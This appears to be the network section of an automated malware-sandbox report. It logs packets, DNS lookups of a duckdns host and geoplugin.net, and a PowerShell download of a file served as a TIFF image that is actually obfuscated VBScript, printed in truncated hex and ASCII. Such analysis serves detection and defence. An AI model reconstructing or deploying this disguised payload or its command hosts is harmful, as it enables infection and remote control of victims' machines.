Nov 20, 2024 17:18:46.324032068 CET  80  49765  192.3.220.29  192.168.2.7
Nov 20, 2024 17:18:46.324404001 CET  80  49765  192.3.220.29  192.168.2.7
Nov 20, 2024 17:18:46.324450970 CET  49765  80  192.168.2.7  192.3.220.29
Nov 20, 2024 17:18:46.324913979 CET  80  49765  192.3.220.29  192.168.2.7
Nov 20, 2024 17:18:46.325279951 CET  80  49765  192.3.220.29  192.168.2.7
Nov 20, 2024 17:18:46.325493097 CET  49765  80  192.168.2.7  192.3.220.29
Nov 20, 2024 17:18:46.325990915 CET  80  49765  192.3.220.29  192.168.2.7
Nov 20, 2024 17:18:46.326364040 CET  80  49765  192.3.220.29  192.168.2.7
Nov 20, 2024 17:18:46.326483011 CET  49765  80  192.168.2.7  192.3.220.29
Nov 20, 2024 17:18:46.326857090 CET  80  49765  192.3.220.29  192.168.2.7
Nov 20, 2024 17:18:46.327474117 CET  80  49765  192.3.220.29  192.168.2.7
Nov 20, 2024 17:18:46.327532053 CET  49765  80  192.168.2.7  192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.327713013 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.328049898 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.328167915 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.329281092 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.329456091 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.329543114 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.329619884 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.329632044 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.329678059 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.330588102 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.330600977 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.330663919 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.331427097 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.331572056 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.331619024 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.332360029 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.332372904 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.332432032 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.333357096 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.333709002 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.333857059 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.334197998 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.334209919 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.334261894 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.335052967 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.335232019 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.335302114 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.335910082 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.336031914 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.336044073 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.336055994 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.336092949 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.336131096 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.336201906 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.336608887 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.336673021 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.337137938 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.337927103 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.337996960 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.338087082 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.338099957 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.338162899 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.338979006 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.339140892 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.339229107 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.339837074 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.339953899 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.340013027 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.340754032 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.341681957 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.341694117 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.341705084 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.341746092 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.341746092 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.342622995 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.342894077 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.342988014 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.343483925 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.390877962 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.458686113 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.458869934 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.458950043 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.458988905 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.459361076 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.459542036 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.460237980 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.460395098 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.460493088 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.461234093 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.461247921 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.461302996 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.461899042 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.462270021 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.462341070 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.463109970 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.463334084 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.463395119 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.464040995 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.464054108 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.464112043 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.464967012 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.464979887 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.465019941 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.465658903 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.466037035 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.466206074 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.466741085 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.466754913 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.467080116 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.467614889 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.467797995 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.467966080 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.468493938 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.469022989 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.469192982 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.469568968 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.469722033 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.469794035 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.470412016 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.470635891 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.470699072 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.471319914 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.471337080 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.471446037 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.472341061 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.472524881 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.472676992 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.473226070 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.473238945 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.473395109 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.474107027 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.474284887 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.474488020 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.474967003 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.475858927 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.475871086 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.476026058 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.476054907 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.476072073 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.476882935 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.477232933 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.477289915 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.477793932 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.478490114 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.478538990 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.478663921 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.478676081 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.478799105 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.479501009 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.479677916 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.479860067 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.480561972 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.480576038 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.480643988 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.481616974 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.481785059 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.481980085 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.482321024 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.482480049 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.482536077 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.483227968 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.483407974 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.483552933 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.484088898 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.484426022 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.484483004 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.485177040 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.485353947 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.485415936 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.486071110 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.486252069 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.486458063 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.486932039 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.487143993 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.487334967 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.487838984 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.487852097 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.487927914 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.488692999 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.489058971 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.489168882 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.489722013 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.489916086 CET8049765192.3.220.29192.168.2.7
                                                                                                          Nov 20, 2024 17:18:46.696755886 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:46.766153097 CET4976580192.168.2.7192.3.220.29
                                                                                                          Nov 20, 2024 17:18:47.096534967 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:18:47.218236923 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:47.218491077 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:18:47.226675034 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:18:47.346251011 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:48.401170969 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:48.453341007 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:18:48.646048069 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:48.652009964 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:18:48.779814005 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:48.781100035 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:18:48.961525917 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:49.186729908 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:49.188028097 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:18:49.315246105 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:49.388600111 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:49.437740088 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:18:50.012042999 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:18:50.131658077 CET8049779178.237.33.50192.168.2.7
                                                                                                          Nov 20, 2024 17:18:50.131745100 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:18:50.131928921 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:18:50.254199982 CET8049779178.237.33.50192.168.2.7
                                                                                                          Nov 20, 2024 17:18:51.453716040 CET8049779178.237.33.50192.168.2.7
                                                                                                          Nov 20, 2024 17:18:51.453797102 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:18:51.466353893 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:18:51.588248968 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:18:52.454380989 CET8049779178.237.33.50192.168.2.7
                                                                                                          Nov 20, 2024 17:18:52.454447031 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:19:16.579185963 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:19:16.580461025 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:19:16.704333067 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:19:46.577610016 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:19:46.579117060 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:19:46.698832989 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:20:16.590383053 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:20:16.591849089 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:20:16.750292063 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:20:39.813561916 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:20:40.159356117 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:20:40.861270905 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:20:42.360131979 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:20:45.047817945 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:20:46.591634035 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:20:46.593441010 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:20:46.714838028 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:20:50.360152960 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:21:00.860172987 CET4977980192.168.2.7178.237.33.50
                                                                                                          Nov 20, 2024 17:21:16.603799105 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:21:16.605096102 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:21:16.726741076 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:21:46.610817909 CET694649773192.3.101.149192.168.2.7
                                                                                                          Nov 20, 2024 17:21:46.614573002 CET497736946192.168.2.7192.3.101.149
                                                                                                          Nov 20, 2024 17:21:46.736475945 CET694649773192.3.101.149192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2024 17:18:20.615947008 CET | 57880 | 53 | 192.168.2.7 | 1.1.1.1
Nov 20, 2024 17:18:20.754757881 CET | 53 | 57880 | 1.1.1.1 | 192.168.2.7
Nov 20, 2024 17:18:46.762770891 CET | 50357 | 53 | 192.168.2.7 | 1.1.1.1
Nov 20, 2024 17:18:47.089551926 CET | 53 | 50357 | 1.1.1.1 | 192.168.2.7
Nov 20, 2024 17:18:49.867156029 CET | 64588 | 53 | 192.168.2.7 | 1.1.1.1
Nov 20, 2024 17:18:50.008496046 CET | 53 | 64588 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 20, 2024 17:18:20.615947008 CET | 192.168.2.7 | 1.1.1.1 | 0xe5c5 | Standard query (0) | 1017.filemail.com | A (IP address) | IN (0x0001) | false
Nov 20, 2024 17:18:46.762770891 CET | 192.168.2.7 | 1.1.1.1 | 0xce09 | Standard query (0) | banaya.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 20, 2024 17:18:49.867156029 CET | 192.168.2.7 | 1.1.1.1 | 0xcb03 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 20, 2024 17:18:20.754757881 CET | 1.1.1.1 | 192.168.2.7 | 0xe5c5 | No error (0) | 1017.filemail.com | ip.1017.filemail.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 20, 2024 17:18:20.754757881 CET | 1.1.1.1 | 192.168.2.7 | 0xe5c5 | No error (0) | ip.1017.filemail.com | - | 142.215.209.78 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 17:18:47.089551926 CET | 1.1.1.1 | 192.168.2.7 | 0xce09 | No error (0) | banaya.duckdns.org | - | 192.3.101.149 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 17:18:50.008496046 CET | 1.1.1.1 | 192.168.2.7 | 0xcb03 | No error (0) | geoplugin.net | - | 178.237.33.50 | A (IP address) | IN (0x0001) | false
• 1017.filemail.com
• 192.3.220.29
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 192.3.220.29 | 80 | 7040 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 17:18:13.018316031 CET | 334 | OUT | GET /45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 192.3.220.29
Connection: Keep-Alive
Nov 20, 2024 17:18:14.218533993 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 20 Nov 2024 16:18:13 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Wed, 20 Nov 2024 06:26:54 GMT
ETag: "22c82-627523c6ee3e7"
Accept-Ranges: bytes
Content-Length: 142466
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff
Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 72 00 65 00 73 00 74 00 69 00 76 00 6f 00 28 00 42 00 79 00 56 00 61 00 6c 00 20 00 61 00 6d 00 62 00 61 00 72 00 69 00 6e 00 6f 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 70 00 6e 00 65 00 6f 00 6d 00 65 00 74 00 72 00 69 00 61 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 63 00 6f 00 6e 00 74 00 72 00 61 00 6d 00 61 00 72 00 74 00 65 00 6c 00 6f 00 73 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 69 00 6d 00 20 00 65 00 73 00 66 00 61 00 6c 00 66 00 61 00 6d 00 65 00 6e 00 74 00 6f 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 73 00 66 00 61 00 6c 00 66 00 61 00 6d 00 65 00 6e 00 74 00 6f 00 20 00 3d 00 20 00 49 00 6e 00 53 00 74 00 72 00 28 00 61 00 6d 00 62 00 61 00 72 00 69 00 6e 00 6f 00 2c 00 20 00 70 00 6e 00 65 00 6f 00 6d 00 65 00 74 00 72 00 69 00 61 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 6f 00 20 00 57 00 68 00 69 00 6c 00 65 00 20 00 65 00 [TRUNCATED]
Data Ascii: Function restivo(ByVal ambarino, ByVal pneometria, ByVal contramartelos) Dim esfalfamento esfalfamento = InStr(ambarino, pneometria) Do While esfalfamento > 0 ambarino = Left(ambarino, esfalfamento - 1) & contramartelos & Mid(ambarino, esfalfamento + Len(pneometria)) esfalfamento = InStr(esfalfamento + Len(contramartelos), ambarino, pneometria) Loop restivo = ambarinoEnd Functionprivate fun
Nov 20, 2024 17:18:14.218667030 CET | 1236 | IN | Data Raw: 00 63 00 74 00 69 00 6f 00 6e 00 20 00 52 00 65 00 61 00 64 00 53 00 74 00 64 00 49 00 6e 00 28 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 77 00 68 00 69 00 6c 00 65 00 20 00 4e 00 6f 00 74 00 20 00 73 00 74 00 64 00 49 00 6e 00 2e 00 41 00 74
Data Ascii: ction ReadStdIn() while Not stdIn.AtEndOfStream ReadStdIn = ReadStdIn & stdIn.ReadAll wendend functi
Nov 20, 2024 17:18:14.218704939 CET | 1236 | IN | Data Raw: 00 45 00 33 00 4d 00 7a 00 41 00 35 00 4e 00 44 00 55 00 78 00 4e 00 7a 00 5a 00 68 00 4d 00 44 00 6b 00 77 00 4e 00 47 00 59 00 42 00 57 00 44 00 43 00 4a 00 58 00 52 00 41 00 53 00 59 00 4d 00 45 00 51 00 47 00 55 00 67 00 61 00 57 00 5a 00 6b
Data Ascii: E3MzA5NDUxNzZhMDkwNGYBWDCJXRASYMEQGUgaWZkOBWDCJXRASYMEQGU29waXdlYkNsaWVuBWDCJXRASYMEQGUdCA9IE5ldyBWDCJXRASYMEQGU1PYmplY3Q
Nov 20, 2024 17:18:14.218740940 CET | 1236 | IN | Data Raw: 00 63 00 70 00 4f 00 32 00 39 00 77 00 61 00 57 00 56 00 75 00 5a 00 45 00 6c 00 75 00 5a 00 47 00 56 00 34 00 49 00 44 00 30 00 67 00 62 00 33 00 42 00 70 00 61 00 57 00 31 00 68 00 5a 00 32 00 56 00 55 00 5a 00 58 00 68 00 30 00 4c 00 6b 00 6c
Data Ascii: cpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3Rhc" reiterativo = reiterativo & "nRJbmR
Nov 20, 2024 17:18:14.218775988 CET | 1236 | IN | Data Raw: 00 58 00 52 00 41 00 53 00 59 00 4d 00 45 00 51 00 47 00 55 00 69 00 59 00 58 00 4e 00 6c 00 4e 00 6a 00 52 00 44 00 62 00 32 00 31 00 74 00 59 00 57 00 35 00 6b 00 4c 00 6c 00 52 00 76 00 51 00 32 00 68 00 68 00 63 00 6b 00 46 00 79 00 63 00 6d
Data Ascii: XRASYMEQGUiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEBWDCJXRASYMEQGUZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGl
Nov 20, 2024 17:18:14.218810081 CET | 1236 | IN | Data Raw: 00 69 00 74 00 65 00 72 00 61 00 74 00 69 00 76 00 6f 00 20 00 26 00 20 00 22 00 77 00 73 00 49 00 45 00 41 00 6f 00 61 00 57 00 5a 00 6b 00 64 00 48 00 68 00 30 00 4c 00 6b 00 64 00 45 00 52 00 46 00 4a 00 45 00 53 00 43 00 38 00 31 00 4e 00 43
